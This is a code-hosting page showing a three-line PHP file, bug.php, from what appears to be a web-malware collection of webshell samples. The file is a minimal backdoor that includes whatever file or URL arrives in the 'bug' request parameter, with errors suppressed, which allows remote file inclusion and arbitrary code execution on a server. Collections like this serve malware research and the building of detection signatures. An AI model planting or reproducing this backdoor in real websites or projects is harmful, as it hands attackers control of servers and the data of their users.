webshell/web-malware-collection-13-06-2012/PHP/bug.php

3 lines
32 B
PHP
Raw Normal View History

2013-06-05 04:08:30 +00:00
<?php
@include($_GET['bug']);
?>